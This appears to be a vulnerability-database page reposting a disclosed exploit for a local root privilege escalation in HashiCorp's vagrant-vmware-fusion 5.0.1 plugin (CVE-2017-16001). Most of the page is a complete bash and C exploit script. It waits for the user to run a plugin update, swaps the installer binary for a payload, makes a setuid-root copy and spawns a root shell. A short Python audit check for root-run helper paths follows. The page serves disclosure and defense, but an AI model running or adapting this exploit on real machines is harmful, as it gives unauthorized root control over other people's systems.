Hashicorp vagrant-vmware-fusion 5.0.1 Local Privilege Escalation

06 Dec 2017 00:00:00 | Reported by Mark Wadham | Type: packetstorm | Source: packetstormsecurity.com

Hashicorp vagrant-vmware-fusion 5.0.1 Local Privilege Escalation fix in version 5.0.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | Hashicorp vagrant-vmware-fusion 5.0.1 - Local root Privilege Escalation Exploit | 6 Dec 2017 00:00 | zdt |
| Circl | CVE-2017-16001 | 6 Dec 2017 00:00 | circl |
| CNVD | HashiCorp Vagrant VMware Fusion Plugin Permissions Vulnerability | 9 Nov 2017 00:00 | cnvd |
| CVE | CVE-2017-16001 | 6 Nov 2017 17:00 | cve |
| Cvelist | CVE-2017-16001 | 6 Nov 2017 17:00 | cvelist |
| EUVD | EUVD-2017-7417 | 7 Oct 2025 00:30 | euvd |
| NVD | CVE-2017-16001 | 6 Nov 2017 17:29 | nvd |
| Prion | Denial of service | 6 Nov 2017 17:29 | prion |

Code
```bash
# I recently blogged about how the installation process of version 5.0.0 of this
# plugin could be hijacked by a local attacker or malware in order to escalate
# privileges to root. Hashicorp pushed some mitigations for this issue fairly
# quickly but unfortunately 5.0.1 is still exploitable with a slightly different
# approach.

# They removed the chmod/chown shell commands from their osascript invocation and
# instead simply executed their installer as root, but apparently didn't realise
# that the installer is not root-owned so can be swapped out by a local attacker
# during the process.

# This issue is fixed in version 5.0.2.

# https://m4.rkw.io/vagrant_vmware_privesc_5.0.1.sh.txt
# c38ecc9fdb4f37323338e8fd12b851133a2121f3505cde664e6d32f1ef49ba23
# -----------------------------------------------------------------------------
#!/bin/bash
echo "########################################"
echo "vagrant_vmware_fusion 5.0.1 root privesc"
echo "by m4rkw"
echo "########################################"
echo
echo "compiling..."

cat > vvf.c <<EOF
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
int main(int ac, char *av[])
{
    setuid(0);
    seteuid(0);
    if (ac > 1) {
        system("mv -f $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64 /tmp/vvf_exp");
        system("chown root:wheel /tmp/vvf_exp");
        system("chmod 4755 /tmp/vvf_exp");
        system("mv -f $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64.orig $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64");
        system("$HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64 install\012");
        return 0;
    }
    system("rm -f /tmp/vvf_exp");
    execl("/bin/bash","bash",NULL);
    return 0;
}
EOF

gcc -o /tmp/vvf_exp vvf.c
rm -f vvf.c

echo "waiting for user to initiate vagrant plugin update..."

while :
do
    r=`ps auxwww |grep '/usr/bin/osascript -e do shell script' |grep 'vagrant-vmware-installer_darwin_amd64'`
    if [ "$r" != "" ] ; then
        break
    fi
done

pid=`ps auxww |grep './vagrant-vmware-installer_darwin_amd64 install' |grep -v grep |xargs -L1 |cut -d ' ' -f2`

cd $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop

echo "dropping payload in place of installer binary..."

mv -f vagrant-vmware-installer_darwin_amd64 vagrant-vmware-installer_darwin_amd64.orig
mv -f /tmp/vvf_exp vagrant-vmware-installer_darwin_amd64

echo "waiting for payload to trigger..."

while :
do
    r=`ls -la /tmp/vvf_exp 2>/dev/null |grep -- '-rwsr-xr-x' |grep root`
    if [ "$r" != "" ] ; then
        echo "spawning shell..."
        /tmp/vvf_exp
        exit 0
    fi
done
```
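
The root cause described in the advisory is that a binary executed as root lived in a path a non-root user could modify. The audit check below is an added example, not part of the original advisory or HashiCorp's fix; the function name `root_exec_findings`, its `trusted_uid` parameter and the `helper-installer` file name are assumptions made for illustration. It checks every ancestor directory as well as the file, because write access to a directory is enough to rename a file inside it.

```python
import os
import stat
import sys
import tempfile


def root_exec_findings(path, trusted_uid=0):
    """Return (path, problem) pairs that make `path` unsafe to run as root.

    Checks the file and every ancestor directory: write access to any
    directory on the path is enough to rename the file and drop in another,
    whatever the file's own owner and mode are.
    """
    findings = []
    current = os.path.realpath(path)  # judge the real target, not a symlink
    while True:
        st = os.stat(current)
        if st.st_uid != trusted_uid:
            findings.append((current, "owner"))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((current, "writable"))
        parent = os.path.dirname(current)
        if parent == current:  # reached the filesystem root
            return findings
        current = parent


def demo():
    """Constructed layout: a helper created by the current user in a temp dir."""
    base = tempfile.mkdtemp()
    helper = os.path.join(base, "helper-installer")  # hypothetical name
    with open(helper, "w") as fh:
        fh.write("#!/bin/sh\n")
    os.chmod(helper, 0o755)
    return root_exec_findings(helper)


if __name__ == "__main__":
    # Audit the path given on the command line, or the constructed demo layout.
    results = root_exec_findings(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for where, problem in results:
        print(f"{problem:8} {where}")
    sys.exit(1 if results else 0)
```

Checking by path and then executing by path is still racy, so this is best used to audit installed layouts; the durable fix is to keep root-run helpers in a root-owned directory that no other user can write to.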
